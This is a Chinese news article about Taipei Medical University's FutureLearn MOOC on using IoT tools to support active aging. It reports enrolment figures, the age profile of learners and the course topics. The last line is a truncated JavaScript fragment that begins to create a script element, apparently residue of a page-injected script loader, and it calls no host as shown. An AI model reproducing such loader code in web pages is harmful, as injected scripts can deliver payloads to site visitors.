北醫大磨課師(MOOCs)與歐洲線上課程平台FutureLearn合作,自前年起陸續推出一系列線上課程,其中「物聯網促進樂齡老化」,由北醫大醫學資訊研究所印度籍助理教授雪必兒(Shabbir Syed Abdul)開課,由於主題創新實用,還沒上線,就已經吸引4千名學生預先報名,大多數的學生來自英國、歐洲及美國。

因應高齡社會來臨,雪必兒表示,這個題目吸引許多高齡長者前來學習,65歲以上的銀髮族學生,就占了54%,其中近40%是66至75歲族群,14%是75歲以上族群,這當中甚至有高齡84歲的英國人來修課,是年紀最大的「學生」。

雪必兒分析讓老年人如此踴躍上網當學生的原因,他指出除了年長者對於物聯網應用在活躍老化的課程非常感興趣外,現在懂電腦、手機的3C老人越來越多,加上磨課師課程打破年長者行動不便的限制,只要在家上網、滑手機,就能上課。根據他統計,這門課累計多達4052人選修,2500則討論串,不少人表示這是一門「很好的課程」、「提供很多很好的資訊」。

雪必兒指出,「物聯網促進樂齡老化」課程共四周,每周兩小時,分成四大課程主題,主要討論如何應用物聯網工具改善跌倒、中風復健、失智及睡眠障礙等。舉例來說,中風老人透過結合電子計步器的智慧手環,可即時傳遞數據讓復健師評估活動量,年長者多玩運用腦力的益智遊戲,可延緩長者老化失智,甚至透過互動式「睡眠教練」APP,可以設定良好作息的生活目標,例如,「一天不喝超過3杯咖啡」等,藉此APP評估改善,一步步克服睡眠障礙。

雪必兒也說,老年人在學習中再小的發現都會樂於與他人分享,因此得到的回饋也特別多,像是課堂上曾有一名學生指出,原本女兒送給自己智慧手環,他自認不需要而將他擺在一旁,但上過互聯網課程後發現智慧手環的好處,就去將它找出來加以使用。而雖然受限於語言問題,導致課程使用者多為歐美人士,但北醫大醫技學院院長李友專表示,在其他平台上也有開中文的課程,希望能讓大眾更為廣泛的使用。

 var d=document;var s=d.createElement(‘script’);